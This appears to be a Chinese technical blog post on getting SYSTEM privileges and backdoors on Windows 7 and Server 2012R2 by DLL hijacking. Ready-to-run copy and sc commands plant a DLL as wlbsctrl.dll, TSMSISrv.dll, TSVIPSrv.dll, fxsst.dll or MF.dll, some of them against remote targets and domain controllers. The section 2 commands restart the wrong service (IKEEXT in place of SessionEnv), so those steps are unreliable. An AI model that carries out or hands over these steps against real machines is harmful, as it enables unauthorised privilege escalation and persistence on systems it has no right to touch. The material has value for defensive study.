win7提权system与后门
CATALOG
- 前言
- 操作过程
- 1.利用wlbsctrl.dll提权
- 2.利用TSMSISrv.dll和TSVIPSrv.dll提权
- 3.实现后门
- 查考文章
前言
今天看了一篇文章,发现文章中的利用方法只能在win7上使用,无法在win10上使用,特做记录。
实现效果:
得到后门执行并得到system权限。
操作过程
1.利用wlbsctrl.dll提权
IKEEXT(IKE and AuthIP IPsec Keying Modules)服务在启动时会加载wlbsctrl.dll,但Windows系统默认配置下该dll不存在,如果我们将自己的dll放在这个位置,在服务启动时就能加载该dll.
先下载恶意dll到本地,然后将其挪到C:\Windows\System32\并命名为wlbsctrl.dll:
参考命令如下:
copy calc_x64.dll C:\Windows\System32\wlbsctrl.dll
sc query IKEEXT
sc stop IKEEXT
sc start IKEEXT
远程执行:
copy calc_x64.dll \\TARGET\C$\Windows\System32\wlbsctrl.dll
sc \\TARGET query IKEEXT
sc \\TARGET stop IKEEXT
sc \\TARGET start IKEEXT
2.利用TSMSISrv.dll和TSVIPSrv.dll提权
SessionEnv(Remote Desktop Configuration)服务在启动时会加载C:\Windows\System32\TSMSISrv.dll和C:\Windows\System32\TSVIPSrv.dll,但Windows系统默认配置下这两个dll不存在,如果我们将自己的dll放在这个位置,在服务启动时就能加载该dll,
启动SessionEnv服务方法为sc start IKEEXT。
利用命令:
copy calc_x64.dll C:\Windows\System32\TSMSISrv.dll
sc query IKEEXT
sc stop IKEEXT
sc start IKEEXT或者copy calc_x64.dll C:\Windows\System32\TSVIPSrv.dll
sc query IKEEXT
sc stop IKEEXT
sc start IKEEXT
远程执行的用法:copy calc_x64.dll \\TARGET\C$\Windows\System32\TSMSISrv.dll
sc \\TARGET query IKEEXT
sc \\TARGET stop IKEEXT
sc \\TARGET start IKEEXT
或者copy calc_x64.dll \\TARGET\C$\Windows\System32\TSVIPSrv.dll
sc \\TARGET query IKEEXT
sc \\TARGET stop IKEEXT
sc \\TARGET start IKEEXT
3.实现后门
如果系统开启了远程桌面的功能(支持远程连接到此计算机),就会开启SessionEnv(Remote Desktop Configuration)服务,如果我们在C:\Windows\System32\下写入TSMSISrv.dll或TSVIPSrv.dll,就能在服务启动时加载该dll,实现代码执行。
应用场景:
获得域控制器文件的远程访问权限,但无法远程执行命令.
1.如果域控制器未开启远程桌面的功能,在系统启动时劫持Explorer.exe对fxsst.dll的加载
写入文件C:\Windows\fxsst.dll
2.如果域控制器开启了远程桌面的功能,在系统启动时将开启SessionEnv服务,加载TSMSISrv.dll或TSVIPSrv.dll
写入文件C:\Windows\System32\TSMSISrv.dll或C:\Windows\System32\TSMSISrv.dll
3.如果域控制器开启了远程桌面的功能,在用户进行远程桌面连接时将会加载MF.dll
实际测试:
测试环境: Server2012R2 x64
写入文件C:\Windows\System32\MF.dll,命令如下:
copy calc_x64.dll C:\Windows\System32\MF.dll
查考文章
《Lateral Movement — SCM and DLL Hijacking Primer》的利用扩展
win7提权system与后门相关推荐
- android提权system,Android push app to /system/app/
背景 个人想要了解一下关于系统权限方面的知识,而我又天真地以为只要把app push到/system/app/目录下,app就有系统签名了,也就能获取到系统权限了.但是其实这样是不行的...算了,学一 ...
- Meterpreter 提权
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpret ...
- juicy-potato Windows提权之访问令牌操纵
0x01 环境 攻击机:Kali 受害机:Windows 2008R2 0x02 利用过程 一.juicy-potato 条件限制: 需要支持SeImpersonate或者SeAssignPrimar ...
- 系统提权之:Windows 提权
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Wi ...
- 利用msf实现windows的上线与提权
环境部署 攻击机:Kali ip:192.168.208.138 靶机:Win7(x64) ip:192.168.208.142 Payload (因为是靶机测试,可以在Kali开启apache2服务 ...
- 提权,远控生成器,查看浏览器缓存,xp密码破解
windows:普通user-> Administrator -> system(系统内核) system不包含user权限,Administrator包含user权限 Linux: u ...
- 通过rootkit隐蔽行踪 Linux提权
每天必问必答: ***1.每天在学什么? ***2.学了有什么用? ***3.工作中如何用? 心得:一定要把实验出错的地方.原因.解决方案都总结到笔记上.笔记一定要自己写的详细些! 服务端:xuego ...
- mysql提权软件后门_Mysql提权留后门
记录一次关于无聊时对基友MYSQL服务器的提权攻击. 尽管没有完全攻击到对方,并且没有清理痕迹,但是,这里写写简单的防御方式. 0x01.从无聊的nmap扫描开始 今晚无聊时候,本想打开电脑扫下谁连进 ...
- 后渗透篇:Windows 2008 server提权之突破系统权限安装shift后门
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 Windows 2008 server提权之突破系统权限安装shift后门 0x01 前言 0x02 主要操作部分 0x03 主要命令组成 ...
最新文章
- Redis学习笔记~Redis在windows环境下的安装
- Spring Cloud Netflix Zuul中的速率限制
- python类装饰器详解-Python类中的装饰器在当前类中的声明与调用详解
- 设计一个shell程序,在/userdata目录下建立50个目录,并对每个目录给754权限!
- 域 和 Session 的问题
- Swift数据类型(一)
- java中io与nio复制文件性能对比
- bootstrap-table.js如何根据单元格数据不同显示不同的字体的颜色
- windows 访问linux中的mongodb,MongoDB的linux系统下的安装与连接
- Myeclipse学习总结(14)——Eclipse/MyEclipse中Java编译时Java反射机形参没有保留问题2种解决方案
- 《Web漏洞防护》读书笔记——第9章,XSS防护
- VC++ 屏幕捕获(DXGI)
- 微信小程序UI设计规范及文档模版
- 【Linux】RHCE备考复习磁盘管理df、fdisk命令
- ewebeditor网页文本编辑器、图片回显、弹窗自动关闭并刷新父页面
- 视频结构化——原子能力解析
- 【异常处理】The CXX compiler identification is unknown
- 招聘网探究分析报告(以描述性分析为主)
- CV10 图像模糊(均值、高斯、中值、双边滤波)
- mysql left join 三表查询_MySql的join(连接)查询 (三表 left join 写法)
热门文章
- file://android,asset/hto,位于 file:///android_asset/www/..的网页无法加载
- 单片机多功能电子琴课设_基于单片机的电子琴设计(最终版)最新版
- 2017年5月许小年最新演讲:深圳人没房的,还是咬咬牙就买吧!
- 凑硬币(58同城2017校招笔试题)
- 电竞入亚各方皆大欢喜,但电竞本身却不是最大赢家
- onlyoffice mysql_windows+onlyoffice安装-Go语言中文社区
- 程序员进阶的10大黄金法则
- esp8266接入天猫精灵教程,附开源app控制
- excel数据分类汇总怎么做
- SpringBoot微服务项目报错:Failed to process import candidates for configuration class [springfox.boot...